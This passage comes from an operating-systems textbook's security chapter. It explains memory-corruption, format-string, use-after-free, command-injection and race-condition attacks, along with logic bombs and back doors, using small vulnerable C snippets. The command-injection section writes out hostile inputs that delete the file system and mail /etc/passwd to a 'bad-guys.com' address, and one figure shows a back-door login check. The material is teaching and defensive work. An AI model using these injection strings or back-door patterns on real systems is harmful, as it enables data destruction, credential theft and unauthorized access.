controls the content of the buffer, he can fill it with machine instructions--to ex-
ecute the attacker's code within the context of the original program. In effect, the
attacker has overwritten memory with his own code and gotten it executed. The
program is now completely under the attacker's control. He can make it do what-
ever he wants. Often, the attacker code is used to launch a shell (for instance by
means of the exec system call), enabling the intruder convenient access to the ma-
chine. For this reason, such code is commonly known as shellcode, even if it does
not spawn a shell.
     This trick works not just for programs using gets (although you should really
avoid using that function), but for any code that copies user-provided data in a
buffer without checking for boundary violations. This user data may consist of
command-line parameters, environment strings, data sent over a network con-
nection, or data read from a user file. There are many functions that copy or move
such data: strcpy, memcpy, strcat, and many others. Of course, any old loop that
you write yourself and that moves bytes into a buffer may be vulnerable as well.
     What if the attacker does not know the exact address to return to? Often an at-
tacker can guess where the shellcode resides approximately, but not exactly.             In
that case, a typical solution is to prepend the shellcode with a nop sled: a sequence
of one-byte NO OPERATION instructions that do not do anything at all. As long as
the attacker manages to land anywhere on the nop sled, the execution will eventu-
ally also reach the real shellcode at the end. Nop sleds work on the stack, but also
on the heap. On the heap, attackers often try to increase their chances by placing
nop sleds and shellcode all over the heap. For instance, in a browser, malicious
JavaScript code may try to allocate as much memory as it can and fill it with a long
nop sled and a small amount of shellcode. Then, if the attacker manages to divert
the control flow and aims for a random heap address, chances are that he will hit
the nop sled. This technique is known as heap spraying.
Stack Canaries
     One commonly used defense against the attack sketched above is to use stack
canaries.  The name derives from the mining profession. Working in a mine is
dangerous work. Toxic gases like carbon monoxide may build up and killl the min-
ers. Moreover, carbon monoxide is odorless, so the miners might not even notice it.



SEC. 9.7                           EXPLOITING SOFTWARE                                         643
In the past, miners therefore brought canaries into the mine as early warning sys-
tems. Any build up of toxic gases would kill the canary before harming its owner.
If your bird died, it was probably time to go up.
Modern computer systems still use (digital) canaries as early warning systems.
The idea is very simple. At places where the program makes a function call, the
compiler inserts code to save a random canary value on the stack, just below the re-
turn address. Upon a return from the function, the compiler inserts code to check
the value of the canary. If the value changed, something is wrong. In that case, it is
better to hit the panic button and crash rather than continuing.
Avoiding Stack Canaries
Canaries work well against attacks like the one above, but many buffer over-
flows are still possible. For instance, consider the code snippet in Fig. 9-22. It uses
two new functions. The strcpy is a C library function to copy a string into a buffer,
while the strlen determines the length of a string.
01.     void A (char *date) {
02.        int len;
03.        char B [128];
04.        char logMsg [256];
05.
06.        strcpy (logMsg, date);   /* first copy the string with the date in the log message */
07.        len = strlen (date);     /* determine how many characters are in the date string */
08.        gets (B);                /* now get the actual message */
09.        strcpy (logMsg+len, B);  /* and copy it after the date into logMessage */
10.        writeLog (logMsg);       /* finally, write the log message to disk */
11.     }
           Figure 9-22. Skipping the stack canary: by modifying len first, the attack is able
           to bypass the canary and modify the return address directly.
As in the previous example, function A reads a log message from standard
input, but this time it explicitly prepends it with the current date (provided as a
string  argument      to  function  A).  First,  it  copies  the         date  into  the  log  message
(line 6). A date string may have different length, depending on the day of the week,
the month, etc. For instance, Friday has 5 letters, but Saturday 8. Same thing for
the months. So, the second thing it does, is determine how many characters are in
the date string (line 7). Then it gets the user input (line 5) and copies it into the log
message, starting just after the date string. It does this by specifying that the desti-
nation of the copy should be the start of the log message plus the length of the date
string (line 9). Finally, it writes the log to disk as before.



644                        SECURITY                                        CHAP. 9
     Let us suppose the system uses stack canaries. How could we possibly change
the return address? The trick is that when the attacker overflows buffer B, he does
not try to hit the return address immediately. Instead, he modifies the variable len
that is located just above it on the stack. In line 9, len serves as an offset that deter-
mines where the contents of buffer B will be written. The programmer's idea was
to skip only the date string, but since the attacker controls len, he may use it to skip
the canary and overwrite the return address.
     Moreover, buffer overflows are not limited to the return address. Any function
pointer that is reachable via an overflow is fair game. A function pointer is just like
a regular pointer, except that it points to a function instead of data. For instance, C
and C++ allow a programmer to declare a variable f as a pointer to a function that
takes a string argument and returns no result, as follows:
     void (*f)(char*);
The syntax is perhaps a bit arcane, but it is really just another variable declaration.
Since function A of the previous example matches the above signature, we can now
write ``f = A'' and use f instead of A in our program. It is beyond this book to go
into function pointers in great detail, but rest assured that function pointers are
quite common in operating systems. Now suppose the attacker manages to over-
write a function pointer. As soon as the program calls the function using the func-
tion pointer, it would really call the code injected by the attacker. For the exploit to
work, the function pointer need not even be on the stack. Function pointers on the
heap are just as useful. As long as the attacker can change the value of a function
pointer or a return address to the buffer that contains the attacker's code, he is able
to change the program's flow of control.
Data Execution Prevention
     Perhaps by now you may exclaim: ``Wait a minute! The real cause of the prob-
lem is not that the attacker is able to overwrite function pointers and return ad-
dresses, but the fact that he can inject code and have it executed. Why not make it
impossible to execute bytes on the heap and the stack?'' If so, you had an epiphany.
However, we will see shortly that epiphanies do not always stop buffer overflow at-
tacks. Still, the idea is pretty good. Code injection attacks will no longer work if
the bytes provided by the attacker cannot be executed as legitimate code.
     Modern CPUs have a feature that is popularly referred to as the NX bit, which
stands for ``No-eXecute.'' It is extremely useful to distinguish between data seg-
ments (heap, stack, and global variables) and the text segment (which contains the
code). Specifically, many modern operating systems try to ensure that data seg-
ments are writable, but are not executable, and the text segment is executable, but
not writable. This policy is known on OpenBSD as W^X (pronounced as ``W
Exclusive-OR X'') or ``W XOR X''). It signifies that memory is either writable or
executable, but not both. Mac OS X, Linux, and Windows have similar protection



SEC. 9.7                     EXPLOITING SOFTWARE                                         645
schemes. A generic name for this security measure is DEP (Data Execution Pre-
vention).  Some hardware does not support the NX bit. In that case, DEP still
works but the enforcement takes place in software.
DEP prevents all of the attacks discussed so far. The attacker can inject as
much shellcode into the process as much as he wants. Unless he is able to make the
memory executable, there is no way to run it.
Code Reuse Attacks
DEP makes it impossible to execute code in a data region. Stack canaries make
it harder (but not impossible) to overwrite return addresses and function pointers.
Unfortunately, this is not the end of the story, because somewhere along the line,
someone else had an epiphany too. The insight was roughly as follows: ``Why
inject code, when there is plenty of it in the binary already?'' In other words, rather
than introducing new code, the attacker simply constructs the necessary func-
tionality out of the existing functions and instructions in the binaries and libraries.
We will first look at the simplest of such attacks, return to libc, and then discuss
the more complex, but very popular, technique of return-oriented programming.
Suppose that the buffer overflow of Fig. 9-22 has overwritten the return ad-
dress of the current function, but cannot execute attacker-supplied code on the
stack. The question is: can it return somewhere else? It turns out it can. Almost all
C programs are linked with the (usually shared) library libc, which contains key
functions most C programs need. One of these functions is system, which takes a
string as argument and passes it to the shell for execution. Thus, using the system
function, an attacker can execute any program he wants. So, instead of executing
shellcode, the attacker simply place a string containing the command to execute on
the stack, and diverts control to the system function via the return address.
The attack is known as return to libc and has several variants. System is not
the only function that may be interesting to the attacker. For instance, attackers
may also use the mprotect function to make part of the data segment executable. In
addition, rather than jumping to the libc function directly, the attack may take a
level of indirection. On Linux, for instance, the attacker may return to the PLT
(Procedure Linkage Table) instead. The PLT is a structure to make dynamic link-
ing easier, and contains snippets of code that, when executed, in turn call the dy-
namically linked library functions. Returning to this code then indirectly executes
the library function.
The        concept  of  ROP  (Return-Oriented       Programming)  takes        the  idea  of
reusing the program's code to its extreme. Rather than return to (the entry points
of) library functions, the attacker can return to any instruction in the text segment.
For instance, he can make the code land in the middle, rather than the beginning, of
a function. The execution will simply continue at that point, one instruction at a
time. Say that after a handful of instructions, the execution encounters another re-
turn instruction. Now, we ask the same question once again: where can we return



646                                 SECURITY                                                     CHAP. 9
to? Since the attacker has control over the stack, he can again make the code return
anywhere he wants to. Moreover, after he has done it twice, he may as well do it
three times, or four, or ten, etc.
     Thus, the trick of return-oriented programming is to look for small sequences
of code that (a) do something useful, and (b) end with a return instruction. The at-
tacker can string together these sequences by means of the return addresses he
places on the stack. The individual snippets are called gadgets.                  Typically, they
have very limited functionality, such as adding two registers, loading a value from
memory into a register, or pushing a value on the stack. In other words, the collec-
tion of gadgets can be seen as a very strange instruction set that the attacker can
use to build aribtary functionality by clever manipulation of the stack. The stack
pointer, meanwhile, serves as a slightly bizarre kind of program counter.
                      &gadget C
                      data          Stack
                      &gadget B
                      data                        Example gadgets:
                      &gadget A
                                                  Gadget A:
                                                  - pop operand off   the stack into register 1
                                                  - if the value is negative, jump to error handler
                      RET                         - otherwise return
                      instr 4
                      instr 3                     Gadget B:
                      instr 2                     - pop operand off the stack into register 2
     gadget  C        instr 1                     - return
(part of function Z)
                                                  Gadget C:
                      RET                         - multiply register 1 by 4
                      instr 3       Text segment  - push register 1
                      instr 2                     - add  register 2 to the value on the top of the stack
     gadget B                                     and store the result in register 2
(part of function Y)  instr 1
                      RET
                      instr 4
                      instr 3
                      instr 2
     gadget  A        instr 1
(part of function X)
                      (a)                                             (b)
                      Figure 9-23. Return-oriented programming: linking gadgets.
     Figure 9-23(a) shows an example of how gadgets are linked together by return
addresses on the stack. The gadgets are short snippets of code that end with a re-
turn instruction. The return instruction will pop the address to return to off the
stack and continue execution there. In this case, the attacker first returns to gadget
A in some function X, then to gadget B in function Y, etc. It is the attacker's job to
gather these gadgets in an existing binary.  As he did not create the gadgets him-
self, he sometimes has to make do with gadgets that are perhaps less than ideal, but



SEC. 9.7                      EXPLOITING SOFTWARE                                           647
good enough for the job. For instance, Fig. 9-23(b) suggests that gadget A has a
check as part of the instruction sequence. The attacker may not care for the check
at all, but since it is there, he will have to accept it. For most purposes, it is perhaps
good enough to pop any nonnegative number into register 1. The next gadget pops
any stack value into register 2, and the third multiplies register 1 by 4, pushes it on
the stack, and adds it to register 2. Combining, these three gadgets yields the at-
tacker something that may be used to calculate the address of an element in an
array of integers. The index into the array is provided by the first data value on the
stack, while the base address of the array should be in the second data value.
Return-oriented programming may look very complicated, and perhaps it is.
But as always, people have developed tools to automate as much as possible. Ex-
amples include gadget harvesters and even ROP compilers. Nowadays, ROP is one
of the most important exploitation techniques used in the wild.
Address-Space Layout Randomization
Here is another idea to stop these attacks. Besides modifying the return address
and injecting some (ROP) program, the attacker should be able to return to exactly
the right address--with ROP no nop sleds are possible. This is easy, if the ad-
dresses are fixed, but what if they are not?  ASLR (Address Space Layout Ran-
domization) aims to randomize the addresses of functions and data between every
run of the program. As a result, it becomes much harder for the attacker to exploit
the system. Specifically, ASLR often randomizes the positions of the initial stack,
the heap, and the libraries.
Like canaries and DEP, many modern operating systems support ASLR, but
often at different granularities. Most of them provide it for user applications, but
only a few apply it consistently also to the operating system kernel itself (Giuffrida
et al., 2012). The combined force of these three protection mechanisms has raised
the bar for attackers significantly. Just jumping to injected code or even some exist-
ing function in memory has become hard work. Together, they form an important
line of defense in modern operating systems. What is especially nice about them is
that they offer their protection at a very reasonable cost to performance.
Bypassing ASLR
Even with all three defenses enabled, attackers still manage to exploit the sys-
tem. There are several weaknesses in ASLR that allow intruders to bypass it. The
first weakness is that ASLR is often not random enough. Many implementations of
ASLR still have certain code at fixed locations. Moreover, even if a segment is ran-
domized, the randomization may be weak, so that an attacker can brute-force it.
For instance, on 32-bit systems the entropy may be limited because you cannot
randomize all bits of the stack. To keep the stack working as a regular stack that
grows downward, randomizing the least significant bits is not an option.



648                                          SECURITY                         CHAP. 9
     A more important attack against ASLR is formed by memory disclosures. In
this case, the attacker uses one vulnerability not to take control of the program di-
rectly, but rather to leak information abour the memory layout, which he can then
use to exploit a second vulnerability. As a trivial example, consider the following
code:
     01. void C( ) {
     02.    int index;
     03.    int prime [16] = { 1,2,3,5,7,11,13,17,19,23,29,31,37,41,43,47 };
     04.    printf ("Which prime number between would you like to see?");
     05.    index = read user input ( );
     06.    printf ("Prime number %d is: %d\n", index, prime[index]);
     07. }
The code contains a call to read user input, which is not part of the standard C li-
brary. We simply assume that it exists and returns an integer that the user types on
the command line. We also assume that it does not contain any errors. Even so, for
this code it is very easy to leak information. All we need to do is provide an index
that is greater than 15, or less than 0. As the program does not check the index, it
will happily return the value of any integer in memory.
     The address of one function is often sufficient for a successful attack. The rea-
son is that even though the position at which a library is loaded may be ran-
domized, the relative offset for each individual function from this position is gener-
ally fixed. Phrased differently: if you know one function, you know them all. Even
if this is not the case, with just one code address, it is often easy to find many oth-
ers, as shown by Snow et al. (2013).
Noncontrol-Flow Diverting Attacks
     So far, we have considered attacks on the control flow of a program: modifying
function pointers and return addresses. The goal was always to make the program
execute new functionality, even if that functionality was recycled from code al-
ready present in the binary. However, this is not the only possibility. The data itself
can be an interesting target for the attacker also, as in the following snippet of
pseudocode:
     01. void A( ) {
     02.    int authorized;
     03.    char name [128];
     04.    authorized = check      credentials (...);  /* the attacker is not authorized, so returns 0 */
     05.    printf ("What is your name?\n");
     06.    gets (name);
     07.    if (authorized != 0) {
     08.     printf ("Welcome %s, here is all our secret data\n", name)
     09.     /* ... show secret data ... */



SEC. 9.7                          EXPLOITING SOFTWARE                                     649
10.       }  else
11.          printf ("Sorry  %s,  but you are not authorized.\n");
12.       }
13. }
The code is meant to do an authorization check. Only users with the right cre-
dentials are allowed to see the top secret data. The function check credentials is
not a function from the C library, but we assume that it exists somewhere in the
program and does not contain any errors. Now suppose the attacker types in 129
characters. As in the previous case, the buffer will overflow, but it will not modify
the return address. Instead, the attacker has modified the value of the authorized
variable, giving it a value that is not 0.  The program does not crash and does not
execute any attacker code, but it leaks the secret information to an unauthorized
user.
Buffer Overflows--The Not So Final Word
Buffer overflows are some of the oldest and most important memory corrup-
tion techniques that are used by attackers. Despite more than a quarter century of
incidents, and a a plethora of defenses (we have only treated the most important
ones), it seems impossible to get rid of them (Van der Veen, 2012). For all this
time, a substantial fraction of all security problems are due to this flaw, which is
difficult to fix because there are so many existing C programs around that do not
check for buffer overflow.
The arms race is nowhere near complete. All around the world, researchers are
investigating new defenses. Some of these defenses are aimed at binaries, others
consists of security extension to C and C++ compilers. It is important to emphasize
that attackers are also improving their exploitation techniques. In this section, we
have tried to given an overview of some of the more important techniques, but
there are many variations of the same idea. The one thing we are fairly certain of is
that in the next edition of this book, this section will still be relevant (and probably
longer).
9.7.2 Format String Attacks
The next attack is also a memory-corruption attack, but of a very different
nature. Some programmers do not like typing, even though they are excellent typ-
ists. Why name a variable reference count when rc obviously means the same
thing and saves 13 keystrokes on every occurrence? This dislike of typing can
sometimes lead to catastrophic system failures as described below.
Consider the following fragment from a C program that prints the traditional C
greeting at the start of a program:



650                                     SECURITY                                     CHAP. 9
     char *s="Hello World";
     printf("%s", s);
In this program, the character string variable s is declared and initialized to a string
consisting of ``Hello World'' and a zero-byte to indicate the end of the string. The
call to the function printf has two arguments, the format string ``%s'', which
instructs it to print a string, and the address of the string. When executed, this piece
of code prints the string on the screen (or wherever standard output goes). It is cor-
rect and bulletproof.
     But suppose the programmer gets lazy and instead of the above types:
     char *s="Hello World";
     printf(s);
This call to printf is allowed because printf has a variable number of arguments, of
which the first must be a format string. But a string not containing any formatting
information (such as ``%s'') is legal, so although the second version is not good
programming practice, it is allowed and it will work. Best of all, it saves typing
five characters, clearly a big win.
     Six months later some other programmer is instructed to modify the code to
first ask the user for his name, then greet the user by name.       After studying the
code somewhat hastily, he changes it a little bit, like this:
     char s[100], g[100] = "Hello ";    /* declare s and g; initialize g */
     gets(s);                           /* read a string from the keyboard into s */
     strcat(g, s);                      /* concatenate s onto the end of g */
     printf(g);                         /* print g */
Now it reads a string into the variable s and concatenates it to the initialized string
g to build the output message in g.     It still works.   So far so good (except for the
use of gets, which is subject to buffer overflow attacks, but it is still popular).
     However, a knowledgeable user who saw this code would quickly realize that
the input accepted from the keyboard is not a just a string; it is a format string, and
as such all the format specifications allowed by printf will work. While most of the
formatting indicators such as ``%s'' (for printing strings) and ``%d'' (for printing
decimal integers), format output, a couple are special.        In particular, ``%n'' does
not print anything.    Instead it calculates how many characters should have been
output already at the place it appears in the string and stores it into the next argu-
ment to printf to be processed. Here is an example program using ``%n'':
     int main(int argc, char *argv[])
     {
        int i=0;
        printf("Hello %nworld\n", &i);  /* the %n stores into i */
        printf("i=%d\n", i);            /* i is now 6 */
     }



SEC. 9.7        EXPLOITING SOFTWARE                                                      651
When this program is compiled and run, the output it produces on the screen is:
Hello world
i=6
Note that the variable i has been modified by a call to printf, something not ob-
vious to everyone. While this feature is useful once in a blue moon, it means that
printing a format string can cause a word--or many words--to be stored into
memory. Was it a good idea to include this feature in print?  Definitely not, but it
seemed so handy at the time. A lot of software vulnerabilities started like this.
As we saw in the preceding example, by accident the programmer who modi-
fied the code allowed the user of the program to (inadvertently) enter a format
string. Since printing a format string can overwrite memory, we now have the tools
needed to overwrite the return address of the printf function on the stack and jump
somewhere else, for example, into the newly entered format string. This approach
is called a format string attack.
Performing a format string attack is not exactly trivial. Where will the number
of characters that the function printed be stored? Well, at the address of the param-
eter following the format string itself, just as in the example shown above. But in
the vulnerable code, the attacker could supply only one string (and no second pa-
rameter to printf). In fact, what will happen is that the printf function will assume
that there is a second parameter. It will just take the next value on the stack and use
that. The attacker may also make printf use the next value on the stack, for instance
by providing the following format string as input:
"%08x %n"
The ``%08x'' means that printf will print the next parameter as an 8-digit hexadeci-
mal number. So if that value is 1, it will print 0000001. In other words, with this
format string, printf will simply assume that the next value on the stack is a 32-bit
number that it should print, and the value after that is the address of the location
where it should store the number of characters printed, in this case 9: 8 for the hex-
adecimal number and one for the space. Suppose he supplies the format string
"%08x %08x %n"
In that case, printf will store the value at the address provided by the third value
following the format string on the stack, and so on.  This is the key to making the
above format string bug a ``write anything anywhere'' primitive for an attacker.
The details are beyond this book, but the idea is that the attacker makes sure that
the right target address is on the stack. This is easier than you may think. For ex-
ample, in the vulnerable code we presented above, the string g is itself also on the
stack, at a higher address than the stack frame of printf (see Fig. 9-24).  Let us as-
sume that the string starts as shown in Fig. 9-24, with ``AAAA'', followed by a se-
quence of ``%0x'' and ending with ``%0n''.          What will happen? Well if the at-
tackers gets the number of ``%0x''s just right, he will have reached the format



652                                   SECURITY                                                    CHAP. 9
                                      AAAA %08x %08x [...] %08x %n  Buffer B
                                                                      first parameter to printf
     stack frame                                                      (pointer to format string)
     of printf
     Figure 9-24. A format string attack. By using exactly the right number of %08x,
     the attacker can use the first four characters of the format string as an address.
string (stored in buffer B) itself. In other words, printf will then use the first 4 bytes
of the format string as the address to write to. Since, the ASCII value of the charac-
ter A is 65 (or 0x41 in hexadecimal), it will write the result at location 0x41414141,
but the attacker can specify other addresses also. Of course, he must make sure that
the number of characters printed is exactly right (because this is what will be writ-
ten in the target address). In practice, there is a little more to it than that, but not
much. If you type: ``format string attack'' to any Internet search engine, you will
find a great deal of information on the problem.
     Once the user has the ability to overwrite memory and force a jump to newly
injected code, the code has all the power and access that the attacked program has.
If the program is SETUID root, the attacker can create a shell with root privileges.
As an aside, the use of fixed-size character arrays in this example could also be
subject to a buffer-overflow attack.
9.7.3 Dangling Pointers
     A third memory-corruption technique that is very popular in the wild is known
as a dangling pointer attack. The simplest manifestation of the technique is quite
easy to understand, but generating an exploit can be tricky. C and C++ allow a pro-
gram to allocate memory on the heap using the malloc call, which returns a pointer



SEC. 9.7                      EXPLOITING SOFTWARE                                        653
to a newly allocated chunk of memory. Later, when the program no longer needs it,
it calls free to release the memory. A dangling pointer error occurs when the pro-
gram accidentally uses the memory after it has already freed it. Consider the fol-
lowing code that discriminates against (really) old people:
01.  int *A = (int *) malloc (128);  /* allocate space for 128 integers */
02.  int year of birth = read user input ( ); /* read an integer from standard input */
03.  if (input < 1900) {
04.       printf ("Error, year of birth should be greater than 1900 \n");
05.       free (A);
06.  } else {
07.       ...
08.       /* do  something interesting with array A */
09.       ...
10.  }
11.  ... /* many more statements, containing malloc and free */
12.  A[0] = year of birth;
The code is wrong. Not just because of the age discrimination, but also because in
line 12 it may assign a value to an element of array A after it was freed already (in
line 5). The pointer A will still point to the same address, but it is not supposed to
be used anymore. In fact, the memory may already have been reused for another
buffer by now (see line 11).
The question is: what will happen? The store in line 12 will try to update mem-
ory that is no longer in use for array A, and may well modify a different data struc-
ture that now lives in this memory area. In general, this memory corruption is not a
good thing, but it gets even worse if the attacker is able to manipulate the program
in such a way that it places a specific heap object in that memory where the first in-
teger of that object contains, say, the user's authorization level. This is not always
easy to do, but there exist techniques (known as heap feng shui) to help attackers
pull it off. Feng Shui is the ancient Chinese art of orienting building, tombs, and
memory on the heap in an auspicious manner. If the digital feng shui master suc-
ceeds, he can now set the authorization level to any value (well, up to 1900).
9.7.4 Null Pointer Dereference Attacks
A few hundred pages ago, in Chapter 3, we discussed memory management in
detail. You may remember how modern operating systems virtualize the address
spaces of the kernel and user processes. Before a program accesses a memory ad-
dress, the MMU translates that virtual address to a physical address by means of
the page tables. Pages that are not mapped cannot be accessed. It seems logical to
assume that the kernel address space and the address space of a user process are
completely different, but this is not always the case. In Linux, for example, the ker-
nel is simply mapped into every process' address space and whenever the kernel



654                                   SECURITY                  CHAP. 9
starts executing to handle a system call, it will run in the process' address space.
On a 32-bit system, user space occupies the bottom 3 GB of the address space and
the kernel the top 1 GB. The reason for this cohabitation is efficiency--switching
between address spaces is expensive.
     Normally this arrangement does not cause any problems. The situation changes
when the attacker can make the kernel call functions in user space. Why would the
kernel do this? It is clear that it should not.  However, remember we are talking
about bugs. A buggy kernel may in rare and unfortunate circumstances accidental-
ly dereference a NULL pointer. For instance, it may call a function using a func-
tion pointer that was not yet initialized. In recent years, several such bugs have
been discovered in the Linux kernel. A null pointer dereference is nasty business as
it typically leads to a crash. It is bad enough in a user process, as it will crash the
program, but it is even worse in the kernel, because it takes down the entire system.
     Somtimes it is worse still, when the attacker is able to trigger the null pointer
dereference from the user process. In that case, he can crash the system whenever
he wants. However, crashing a system does not get you any high fives from your
cracker friends--they want to see a shell.
     The crash happens because there is no code mapped at page 0. So the attacker
can use special function, mmap, to remedy this.          With mmap, a user process can
ask the kernel to map memory at a specific address. After mapping a page at ad-
dress 0, the attacker can write shellcode in this page. Finally, he triggers the null
pointer dereference, causing the shellcode to be executed with kernel privileges.
High fives all around.
     On modern kernels, it is no longer possible to mmap a page at address 0. Even
so, many older kernels are still used in the wild. Moreover, the trick also works
with pointers that have different values. With some bugs, the attacker may be able
to inject his own pointer into the kernel and have it dereferenced. The lessons we
learn from this exploit is that kerneluser interactions may crop up in unexpected
places and that optimizations to improve performance may come to haunt you in
the form of attacks later.
9.7.5 Integer Overflow Attacks
     Computers do integer arithmetic on fixed-length numbers, usually 8, 16, 32, or
64 bits long.  If the sum of two numbers to be added or multiplied exceeds the
maximum integer that can be represented, an overflow occurs.    C programs do not
catch this error; they just store and use the incorrect value.  In particular, if the
variables are signed integers, then the result of adding or multiplying two positive
integers may be stored as a negative integer.    If the variables are unsigned, the re-
sults will be positive, but may wrap around.     For example, consider two unsigned
16-bit integers each containing the value 40,000.        If they are multiplied together
and the result stored in another unsigned 16-bit integer, the apparent product is
4096. Clearly this is incorrect but it is not detected.



SEC. 9.7                            EXPLOITING SOFTWARE                                         655
   This ability to cause undetected numerical overflows can be turned into an at-
tack. One way to do this is to feed a program two valid (but large) parameters in
the knowledge that they will be added or multiplied and result in an overflow. For
example,       some   graphics      programs      have  command-line  parameters        giving  the
height and width of an image file, for example, the size to which an input image is
to be converted. If the target width and height are chosen to force an overflow, the
program will incorrectly calculate how much memory it needs to store the image
and call malloc to allocate a much-too-small buffer for it. The situation is now ripe
for a buffer overflow attack.       Similar exploits are possible when the sum or product
of signed positive integers results in a negative integer.
9.7.6 Command Injection Attacks
   Yet another exploit involves getting the target program to execute commands
without realizing it is doing so. Consider a program that at some point needs to
duplicate some user-supplied file under a different name (perhaps as a backup).                 If
the programmer is too lazy to write the code, he could use the system function,
which forks off a shell and executes its argument as a shell command. For ex-
ample, the C code
   system("ls         >file-list")
forks off a shell that executes the command
   ls  >file-list
listing all the files in the current directory and writing them to a file called file-list.
The code that the lazy programmer might use to duplicate the file is given in
Fig. 9-25.
int main(int argc, char *argv[])
{
   char src[100], dst[100], cmd[205] = "cp ";           /* declare 3 strings */
   printf("Please enter name of source file: ");        /* ask for source file */
   gets(src);                                           /* get input from the keyboard */
   strcat(cmd, src);                                    /* concatenate src after cp */
   strcat(cmd, " ");                                    /* add a space to the end of cmd */
   printf("Please enter name of destination file:  ");  /* ask for output file name */
   gets(dst);                                           /* get input from the keyboard */
   strcat(cmd, dst);                                    /* complete the commands string */
   system(cmd);                                         /* execute the cp command */
}
                      Figure 9-25. Code that might lead to a command injection attack.
   What the program does is ask for the names of the source and destination files,
build a command line using cp, and then call system to execute it. Suppose that the



656                                   SECURITY                          CHAP. 9
user types in ``abc'' and ``xyz'' respectively, then the command that the shell will
execute is
     cp abc xyz
which indeed copies the file.
     Unfortunately this code opens up a gigantic security hole using a technique
called command injection. Suppose that the user types ``abc'' and ``xyz; rm rf /''
instead. The command that is constructed and executed is now
     cp abc xyz; rm rf /
which first copies the file, then attempts to recursively remove every file and every
directory in the entire file system.  If the program is running as superuser, it may
well succeed.      The problem, of course, is that everything following the semicolon
is executed as a shell command.
     Another example of the second argument might be ``xyz; mail snooper@bad-
guys.com </etc/passwd'', which produces
     cp abc xyz; mail snooper@bad-guys.com </etc/passwd
thereby sending the password file to an unknown and untrusted address.
9.7.7 Time of Check to Time of Use Attacks
     The last attack in this section is of a very different nature. It has nothing to do
with memory corruption or command injection. Instead, it exploits race condi-
tions.  As always, it can best be illustrated with an example. Consider the code
below:
     int fd;
     if (access ("./my document", W OK) != 0) {
        exit (1);
     fd = open ("./my document", O WRONLY)
     write (fd, user input, sizeof (user input));
     We assume again that the program is SETUID root and the attacker wants to
use its privileges to write to the password file. Of course, he does not have write
permission to the password file, but let us have a look at the code. The first thing
we note is that the SETUID program is not supposed to write to the password file
at all--it only wants to write to a file called ``my document'' in the current work-
ing directory. However, even though a user may have this file in his current work-
ing directory, it does not mean that he really has write permission to this file. For
instance, the file could be a symbolic link to another file that does not belong to the
user at all, for example, the password file.



SEC. 9.7             EXPLOITING SOFTWARE                                                 657
To prevent this, the program performs a check to make sure the user has write
access to the file by means of the access system call.  The call checks the actual
file (i.e., if it is a symbolic link, it will be dereferenced), returning 0 if the re-
quested access is allowed and an error value of -1 otherwise. Moreover, the check
is carried out with the calling process' real UID, rather than the effective UID (be-
cause otherwise a SETUID process would always have access). Only if the check
succeeds will the program proceed to open the file and write the user input to it.
The program looks secure, but is not. The problem is that the time of the ac-
cess check for privileges and the time at which the privileges are used are not the
same. Assume that a fraction of a second after the check by access, the attacker
manages to create a symbolic link with the same file name to the password file. In
that case, the open will open the wrong file, and the write of the attacker's data will
end up in the password file. To pull it off, the attacker has to race with the program
to create the symbolic link at exactly the right time.
The attack is known as a TOCTOU (Time of Check to Time of Use) attack.
Another way of looking at this particular attack is to observe that the access system
call is simply not safe. It would be much better to open the file first, and then check
the permissions using the file descriptor instead--using the fstat function. File de-
scriptors are safe, because they cannot be changed by the attacker between the fstat
and write calls. It shows that designing a good API for operating system is ex-
tremely important and fairly hard. In this case, the designers got it wrong.
9.8 INSIDER ATTACKS
A whole different category of attacks are what might be termed ``inside jobs.''
These are executed by programmers and other employees of the company running
the computer to be protected or making critical software. These attacks differ from
external attacks because the insiders have specialized knowledge and access that
outsiders do not have. Below we will give a few examples; all of them have oc-
curred repeatedly in the past. Each one has a different flavor in terms of who is
doing the attacking, who is being attacked, and what the attacker is trying to
achieve.
9.8.1 Logic Bombs
In these times of massive outsourcing, programmers often worry about their
jobs. Sometimes they even take steps to make their potential (involuntary) depar-
ture less painful. For those who are inclined toward blackmail, one strategy is to
write a logic bomb.  This device is a piece of code written by one of a company's
(currently employed) programmers and secretly inserted into the production sys-
tem.  As long as the programmer feeds it its daily password, it is happy and does
nothing.  However, if the programmer is suddenly fired and physically removed



658                                       SECURITY                                 CHAP. 9
from the premises without warning, the next day (or next week) the logic bomb
does not get fed its daily password, so it goes off. Many variants on this theme are
also possible.      In one famous case, the logic bomb checked the payroll.        If the per-
sonnel number of the programmer did not appear in it for two consecutive payroll
periods, it went off (Spafford et al., 1989).
     Going off might involve clearing the disk, erasing files at random, carefully
making hard-to-detect changes to key programs, or encrypting essential files.               In
the latter case, the company has a tough choice about whether to call the police
(which may or may not result in a conviction many months later but certainly does
not restore the missing files) or to give in to the blackmail and rehire the ex-pro-
grammer as a ``consultant'' for an astronomical sum to fix the problem (and hope
that he does not plant new logic bombs while doing so).
     There have been recorded cases in which a virus planted a logic bomb on the
computers it infected. Generally, these were programmed to go off all at once at
some date and time in the future. However, since the programmer has no idea in
advance of which computers will be hit, logic bombs cannot be used for job pro-
tection or blackmail. Often they are set to go off on a date that has some political
significance. Sometimes these are called time bombs.
9.8.2 Back Doors
     Another security hole caused by an insider is the back door.                  This problem is
created by code inserted into the system by a system programmer to bypass some
normal check. For example, a programmer could add code to the login program to
allow anyone to log in using the login name ``zzzzz'' no matter what was in the
password file. The normal code in the login program might look something like
Fig. 9-26(a). The back door would be the change to Fig. 9-26(b).
while (TRUE) {                            while (TRUE) {
     printf("login: ");                        printf("login: ");
     get string(name);                         get string(name);
     disable echoing( );                       disable echoing( );
     printf("password: ");                     printf("password: ");
     get string(password);                     get string(password);
     enable echoing( );                        enable echoing( );
     v = check validity(name, password);       v = check validity(name, password);
     if (v) break;                             if (v || strcmp(name, "zzzzz") == 0) break;
}                                         }
execute shell(name);                      execute shell(name);
     (a)                                       (b)
                Figure 9-26. (a) Normal code. (b) Code with a back door inserted.
     What the call to strcmp does is check if the login name is ``zzzzz''.         If so, the
login succeeds, no matter what password is typed.         If this back-door code were



SEC. 9.8                          INSIDER ATTACKS                                      659
inserted by a programmer working for a computer manufacturer and then shipped
with its computers, the programmer could log into any computer made by his com-
pany, no matter who owned it or what was in the password file. The same holds for
a programmer working for the OS vendor.         The back door simply bypasses the
whole authentication process.
     One way for companies to prevent backdoors is to have code reviews as stan-
dard practice. With this technique, once a programmer has finished writing and
testing a module, the module is checked into a code database. Periodically, all the
programmers in a team get together and each one gets up in front of the group to
explain what his code does, line by line. Not only does this greatly increase the
chance that someone will catch a back door, but it raises the stakes for the pro-
grammer, since being caught red-handed is probably not a plus for his career.              If
the programmers protest too much when this is proposed, having two coworkers
